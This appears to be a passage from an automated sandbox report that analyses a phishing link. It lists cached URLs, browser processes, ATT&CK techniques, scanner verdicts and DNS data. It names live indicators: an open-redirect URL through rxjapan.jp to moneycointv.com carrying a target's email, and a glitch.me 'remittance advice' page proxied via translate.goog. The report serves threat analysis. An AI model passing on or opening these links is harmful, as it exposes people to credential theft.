    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/m-Ok3vfGKDPtv6u7QjPVLMFAw1rXk28qMAEujh1qRxXf4eHUZlVsV27Sqgqh7Ck98Y
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/sarNvJGsElTyskguj3eBs8jWOiO3GZzu0FTOotLbaVX4D9Wt17OLO7MRdFiedqYyzj
    Source: chromecache_449.1.drString found in binary or memory: https://lh3.googleusercontent.com/zJJ46221TjPk5JoBgl6ZsaGsKkhMeqOzEFFyj5qi_yRaD0kwmYY-wjn-xitI7EPmO3
    Source: chromecache_543.1.drString found in binary or memory: https://moltron-pa.clients6.google.com
    Source: chromecache_509.1.drString found in binary or memory: https://ogs.google.com/
    Source: chromecache_509.1.drString found in binary or memory: https://ogs.google.com/widget/callout
    Source: chromecache_440.1.dr, chromecache_719.1.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
    Source: chromecache_449.1.drString found in binary or memory: https://play.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_493.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_449.1.drString found in binary or memory: https://policies.google.com/privacy?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer
    Source: chromecache_509.1.drString found in binary or memory: https://policies.google.com/technologies/cookies
    Source: chromecache_449.1.drString found in binary or memory: https://policies.google.com/terms?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-l
    Source: chromecache_493.1.drString found in binary or memory: https://redux.js.org/api/store#subscribelistener
    Source: chromecache_672.1.drString found in binary or memory: https://remittanceadvice--details-glitch-me.translate.goog
    Source: chromecache_672.1.drString found in binary or memory: https://remittanceadvice--details-glitch-me.translate.goog/remittance.html?_x_tr_sl=auto&amp;_x_tr_t
    Source: chromecache_672.1.drString found in binary or memory: https://remittanceadvice-details.glitch.me/remittance.html
    Source: chromecache_449.1.drString found in binary or memory: https://safety.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://safety.google/?utm_source=about.google&amp;utm_medium=referral&amp;utm_campaign=site-switche
    Source: chromecache_588.1.drString found in binary or memory: https://sandbox.google.com/inapp/%
    Source: chromecache_588.1.drString found in binary or memory: https://sandbox.google.com/tools/feedback/%
    Source: chromecache_588.1.drString found in binary or memory: https://scone-pa.clients6.google.com
    Source: chromecache_720.1.drString found in binary or memory: https://services.google.com/fb/submissions/cwgsignup/
    Source: chromecache_449.1.drString found in binary or memory: https://shopping.google.com/?nord=1?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer
    Source: chromecache_449.1.drString found in binary or memory: https://smallbusiness.withgoogle.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=foot
    Source: chromecache_509.1.drString found in binary or memory: https://ssl.gstatic.com
    Source: chromecache_588.1.drString found in binary or memory: https://ssl.gstatic.com/inproduct_help/guidedhelp/guide_inproduct.js
    Source: chromecache_588.1.drString found in binary or memory: https://ssl.gstatic.com/inproduct_help/guidedhelp_staging/guide_inproduct.js
    Source: chromecache_719.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect
    Source: chromecache_719.1.drString found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
    Source: chromecache_449.1.drString found in binary or memory: https://store.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_543.1.dr, chromecache_509.1.drString found in binary or memory: https://support.google.com
    Source: chromecache_509.1.drString found in binary or memory: https://support.google.com&quot;
    Source: chromecache_449.1.drString found in binary or memory: https://support.google.com/?hl=en
    Source: chromecache_449.1.drString found in binary or memory: https://support.google.com/?hl=en/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-
    Source: chromecache_543.1.drString found in binary or memory: https://support.google.com/communities/answer/7424249
    Source: chromecache_543.1.drString found in binary or memory: https://support.google.com/communities/answer/7425194
    Source: chromecache_588.1.drString found in binary or memory: https://support.google.com/inapp/%
    Source: chromecache_543.1.drString found in binary or memory: https://support.google.com/translate/
    Source: chromecache_493.1.drString found in binary or memory: https://support.google.com/youtube/?p=missing_quality
    Source: chromecache_493.1.drString found in binary or memory: https://support.google.com/youtube/?p=noaudio
    Source: chromecache_493.1.drString found in binary or memory: https://support.google.com/youtube/?p=report_playback
    Source: chromecache_493.1.drString found in binary or memory: https://support.google.com/youtube/answer/6276924
    Source: chromecache_449.1.drString found in binary or memory: https://sustainability.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://sustainability.google/?utm_source=about.google&amp;utm_medium=referral&amp;utm_campaign=site
    Source: chromecache_449.1.drString found in binary or memory: https://sustainability.google/progress/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=fo
    Source: chromecache_440.1.dr, chromecache_719.1.drString found in binary or memory: https://td.doubleclick.net
    Source: chromecache_588.1.drString found in binary or memory: https://test-scone-pa-googleapis.sandbox.google.com
    Source: chromecache_601.1.drString found in binary or memory: https://translate-autopush.corp.google.com/websitetranslationui
    Source: chromecache_601.1.drString found in binary or memory: https://translate-daily-1.corp.google.com/websitetranslationui
    Source: chromecache_601.1.drString found in binary or memory: https://translate-dev.corp.google.com/websitetranslationui
    Source: chromecache_672.1.drString found in binary or memory: https://translate.google.com/translate_a/element.js?cb=gtElInit&amp;hl=en&amp;client=wt
    Source: chromecache_672.1.drString found in binary or memory: https://translate.google.com/website?sl=auto&amp;tl=en&amp;hl=en&amp;client=webapp&amp;u=https://rem
    Source: chromecache_601.1.drString found in binary or memory: https://translate.google.com/websitetranslationui
    Source: chromecache_449.1.drString found in binary or memory: https://transparencyreport.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=foo
    Source: chromecache_449.1.drString found in binary or memory: https://twitter.com/google
    Source: chromecache_599.1.dr, chromecache_448.1.dr, chromecache_467.1.dr, chromecache_642.1.drString found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
    Source: chromecache_493.1.drString found in binary or memory: https://viacon.corp.google.com
    Source: chromecache_449.1.drString found in binary or memory: https://wellbeing.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://workspace.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://www.android.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://www.blog.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_720.1.drString found in binary or memory: https://www.blog.google/api/v2/latest/?show_hero=true&tags=
    Source: chromecache_720.1.drString found in binary or memory: https://www.blog.google/api/v2/latest/?tags=
    Source: chromecache_449.1.drString found in binary or memory: https://www.blog.google/press/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_543.1.dr, chromecache_440.1.dr, chromecache_549.1.drString found in binary or memory: https://www.google-analytics.com/analytics.js
    Source: chromecache_588.1.drString found in binary or memory: https://www.google.cn/tools/feedback/%
    Source: chromecache_543.1.drString found in binary or memory: https://www.google.com
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/accessibility/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=foot
    Source: chromecache_543.1.drString found in binary or memory: https://www.google.com/accounts/TOS
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/chrome/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/doodles
    Source: chromecache_720.1.drString found in binary or memory: https://www.google.com/doodles/history/%
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/gmail/about/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer
    Source: chromecache_509.1.drString found in binary or memory: https://www.google.com/images/hpp/gsa_super_g-64.gif
    Source: chromecache_543.1.dr, chromecache_599.1.dr, chromecache_448.1.dr, chromecache_467.1.dr, chromecache_493.1.drString found in binary or memory: https://www.google.com/log?format=json&hasfast=true
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/maps/about/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.com/photos/about/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=foote
    Source: chromecache_543.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js?trustedtypes=true&onload=%
    Source: chromecache_543.1.drString found in binary or memory: https://www.google.com/recaptcha/api.js?trustedtypes=true&render=explicit&onload=
    Source: chromecache_588.1.dr, chromecache_601.1.drString found in binary or memory: https://www.google.com/tools/feedback
    Source: chromecache_588.1.drString found in binary or memory: https://www.google.com/tools/feedback/%
    Source: chromecache_588.1.drString found in binary or memory: https://www.google.com/tools/feedback/help_panel_binary.js
    Source: chromecache_449.1.drString found in binary or memory: https://www.google.org/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_493.1.drString found in binary or memory: https://www.googleapis.com/certificateprovisioning/v1/devicecertificates/create?key=AIzaSyB-5OLKTx2i
    Source: chromecache_543.1.drString found in binary or memory: https://www.googleapis.com/youtube/v3
    Source: chromecache_543.1.drString found in binary or memory: https://www.googleapis.com/youtube/v3/videos?part=snippet%2C
    Source: chromecache_440.1.dr, chromecache_719.1.drString found in binary or memory: https://www.googletagmanager.com/a?id=
    Source: chromecache_543.1.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-H30R9PNQFN
    Source: chromecache_449.1.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
    Source: chromecache_449.1.drString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-WQZB4J
    Source: chromecache_478.1.dr, chromecache_670.1.dr, chromecache_509.1.drString found in binary or memory: https://www.gstatic.com
    Source: chromecache_509.1.drString found in binary or memory: https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.DLVh3rihYK8.
    Source: chromecache_672.1.drString found in binary or memory: https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.L2UMboe2Sos.O/d=1/exm=corspr
    Source: chromecache_672.1.drString found in binary or memory: https://www.gstatic.com/_/translate_http/_/js/k=translate_http.tr.en_GB.L2UMboe2Sos.O/d=1/rs=AN8SPfr
    Source: chromecache_449.1.drString found in binary or memory: https://www.gstatic.com/brandstudio/kato/cookie_choice_component/cookie_consent_bar.v3.js
    Source: chromecache_543.1.dr, chromecache_601.1.drString found in binary or memory: https://www.gstatic.com/feedback/js/help/prod/service/lazy.min.js
    Source: chromecache_449.1.drString found in binary or memory: https://www.gstatic.com/glue/polyfill.min.js
    Source: chromecache_449.1.drString found in binary or memory: https://www.gstatic.com/images/branding/googleg/2x/googleg_standard_color_120dp.png
    Source: chromecache_543.1.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chromecache_543.1.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/search_black_24dp.png
    Source: chromecache_543.1.drString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chromecache_689.1.dr, chromecache_543.1.dr, chromecache_588.1.dr, chromecache_601.1.drString found in binary or memory: https://www.gstatic.com/uservoice/feedback/client/web/
    Source: chromecache_588.1.drString found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/
    Source: chromecache_588.1.drString found in binary or memory: https://www.gstatic.com/uservoice/surveys/resources/%
    Source: chromecache_449.1.drString found in binary or memory: https://www.linkedin.com/company/google
    Source: chromecache_719.1.drString found in binary or memory: https://www.merchant-center-analytics.goog/mc/collect
    Source: chromecache_588.1.drString found in binary or memory: https://www.support.google.com/
    Source: chromecache_626.1.drString found in binary or memory: https://www.youtube.com
    Source: chromecache_449.1.drString found in binary or memory: https://www.youtube.com/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link
    Source: chromecache_493.1.drString found in binary or memory: https://www.youtube.com/api/drm/fps?ek=
    Source: chromecache_493.1.drString found in binary or memory: https://www.youtube.com/generate_204?cpn=
    Source: chromecache_720.1.dr, chromecache_719.1.drString found in binary or memory: https://www.youtube.com/iframe_api
    Source: chromecache_449.1.drString found in binary or memory: https://www.youtube.com/user/Google
    Source: chromecache_493.1.drString found in binary or memory: https://youtu.be/
    Source: chromecache_493.1.drString found in binary or memory: https://youtube.com/api/drm/fps?ek=uninitialized
    Source: chromecache_493.1.drString found in binary or memory: https://youtubei.googleapis.com/youtubei/
    Source: chromecache_493.1.drString found in binary or memory: https://yurt.corp.google.com
    Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CONSENT=PENDING+904; SOCS=CAISHAgCEhJnd3NfMjAyMjA4MDgtMF9SQzEaAmVuIAEaBgiAvOuXBg
    Source: classification engineClassification label: mal64.phis.win@43/383@28/22
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3164 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1944 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3164 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6152 --field-trial-handle=1712,i,17168280945086885359,14022515936100415220,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Next
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeAutomated click: Ok
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\GoogleUpdaterJump to behavior
    Source: Binary string: _.hdb=_.K("MZfLnc");_.idb=_.K("nt4Alf");_.jdb=_.K("B01qod");_.kdb=_.K("fbgABc");_.ldb=_.K("LJ0EJd");_.mdb=_.K("m76vSb");_.wY=_.K("H1e5u");_.K("ORewz");_.ndb=_.K("kjpCo");_.odb=_.K("wv82t");_.K("jQE2Wd");_.pdb=_.K("mzWwbd");_.qdb=_.K("lYIUJf");_.rdb=_.K("XGCiZd");_.sdb=_.K("nO4Rvb");_.tdb=_.K("ETQGm");_.udb=_.K("lzRwDf");_.vdb=_.K("eRlb5");_.wdb=_.K("oBx8eb");_.xdb=_.K("Aq4dme");_.ydb=_.K("azdFVc");_.zdb=_.K("sxYq5b");_.Adb=_.K("x99D2c"); source: chromecache_549.1.dr
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    1
    Drive-by Compromise
    Windows Management InstrumentationPath Interception1
    Process Injection
    2
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local SystemExfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
    Non-Application Layer Protocol
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration4
    Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
    Ingress Tool Transfer
    SIM Card SwapCarrier Billing Fraud
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com100%SlashNextCredential Stealing type: Phishing & Social Engineering
    https://www.rxjapan.jp/?wptouch_switch=desktop&redirect=https%3A%2F%2Fmoneycointv.com%2Fwp-includes%2FAuth%2Fsf_rand_string_lowercase%286%29%2F%2F%2Fdan@glassvice.com0%Avira URL Cloudsafe
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    https://about.google/0%URL Reputationsafe
    https://about.google/favicon.ico0%URL Reputationsafe
    https://support.google.com&quot;0%Avira URL Cloudsafe
    https://about.google/assets-stories-2021/js/index.min.js?cache=e360a660%Avira URL Cloudsafe
    https://safety.google/?utm_source=about&amp;utm_medium=referral&amp;utm_campaign=footer-link0%Avira URL Cloudsafe
    https://about.google/assets-main/img/glue-google-solid-logo.svg0%Avira URL Cloudsafe
    https://about.google/assets-stories-2021/css/year-in-search.min.css?cache=fc7fdb80%Avira URL Cloudsafe
    https://about.google/assets-stories-2021/css/index.min.css?cache=9e0af630%Avira URL Cloudsafe
    https://lens.google/?hl=0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      high
      csp.withgoogle.com
      172.217.168.17
      truefalse
        unknown
        accounts.google.com
        142.250.203.109
        truefalse
          high
          plus.l.google.com
          172.217.168.78
          truefalse
            high
            i.ytimg.com
            142.250.203.118
            truefalse
              high
              maxcdn.bootstrapcdn.com
              104.18.11.207
              truefalse
                high
                support.google.com
                172.217.168.78
                truefalse
                  high
                  www.moneycointv.com
                  54.36.145.173
                  truefalse
                    unknown
                    static.doubleclick.net
                    172.217.168.38
                    truefalse
                      high
                      remittanceadvice--details-glitch-me.translate.goog
                      216.58.215.225
                      truefalse
                        unknown
                        about.google
                        216.239.32.29
                        truefalse
                          unknown
                          stats.g.doubleclick.net
                          108.177.96.155
                          truefalse
                            high
                            youtube-ui.l.google.com
                            172.217.168.14
                            truefalse
                              high
                              moneycointv.com
                              54.36.145.173
                              truefalse
                                unknown
                                www3.l.google.com
                                172.217.168.78
                                truefalse
                                  high
                                  play.google.com
                                  142.250.203.110
                                  truefalse
                                    high
                                    googleads.g.doubleclick.net
                                    142.250.203.98
                                    truefalse
                                      high
                                      cdnjs.cloudflare.com
                                      104.17.24.14
                                      truefalse
                                        high
                                        ghs-svc-https-sni.ghs-ssl.googlehosted.com
                                        142.250.203.115
                                        truefalse
                                          unknown
                                          photos-ugc.l.googleusercontent.com
                                          142.250.203.97
                                          truefalse
                                            high
                                            www.google.com
                                            142.250.203.100
                                            truefalse
                                              high
                                              clients.l.google.com
                                              142.250.203.110
                                              truefalse
                                                high
                                                www.rxjapan.jp
                                                165.100.216.103
                                                truefalse
                                                  unknown
                                                  googlehosted.l.googleusercontent.com
                                                  172.217.168.65
                                                  truefalse
                                                    high
                                                    yt3.ggpht.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      www.blog.google
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        ogs.google.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          lh3.googleusercontent.com
                                                          unknown
                                                          unknownfalse
                                                            high
                                                            clients2.google.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              code.jquery.com
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                www.youtube.com
                                                                unknown
                                                                unknownfalse
                                                                  high
                                                                  translate.google.com
                                                                  unknown
                                                                  unknownfalse
                                                                    high
                                                                    apis.google.com
                                                                    unknown
                                                                    unknownfalse
                                                                      high
                                                                      NameMaliciousAntivirus DetectionReputation
                                                                      https://translate.google.com/opensearch.xml?hl=enfalse
                                                                        high
                                                                        https://www.youtube.com/embed/DVwHCGAr_OE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=17false
                                                                          high
                                                                          https://about.google/assets-stories-2021/css/year-in-search.min.css?cache=fc7fdb8false
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://www.google.com/gen_204?use_corp=on&atyp=i&zx=1679378264549&ogsr=1&ei=1tYYZLbOFJC7nsEPmYW9qA4&ct=7&cad=i&id=19022645&loc=undefined&prid=117&ogd=co.uk&ogprm=up&ap=1&vis=1false
                                                                            high
                                                                            https://www.youtube.com/embed/q7o7R5BgWDY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=15false
                                                                              high
                                                                              https://www.youtube.com/embed/4WXs3sKu41I?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=1false
                                                                                high
                                                                                https://lh3.googleusercontent.com/yUfZC3C2Zy7jpvG0VIa0JY6deVELiJXaXOPx18ZYtHvHJDBKOhGLc9S0e2bXc3t8OdDyMbr6at7dqFWUzUspazqgpKlmdO3_YQHGmqPT=s660false
                                                                                  high
                                                                                  https://www.google.com/logos/doodles/2018/fall-equinox-2018-6545460612300800.2-2xa.giffalse
                                                                                    high
                                                                                    https://lh3.googleusercontent.com/DadS_3zeQeDcl8UL1JN5Fde-_q5NFV2n6-0So7Ylpd00U0i3zhPXRGJJv98HlfKif4nPzY73AoYQWeuX55cYuZ0Puc45APIrNEYbdmsYLJhpI0sBXLkfalse
                                                                                      high
                                                                                      https://about.google/assets-stories-2021/js/index.min.js?cache=e360a66false
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.youtube.com/embed/SAIEamakLoY?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=23false
                                                                                        high
                                                                                        https://www.youtube.com/embed/F0QXB5pw2qE?rel=0&vq=hd720&start=0&cc_load_policy=1&playsinline=1&origin=https%3A%2F%2Fabout.google&enablejsapi=1&widgetid=25false
                                                                                          high
                                                                                          https://www.youtube.com/youtubei/v1/log_event?alt=json&key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8false
                                                                                            high
                                                                                            https://translate.google.com/about/?hl=en-USfalse
                                                                                              high
                                                                                              https://about.google/assets-main/img/glue-google-solid-logo.svgfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
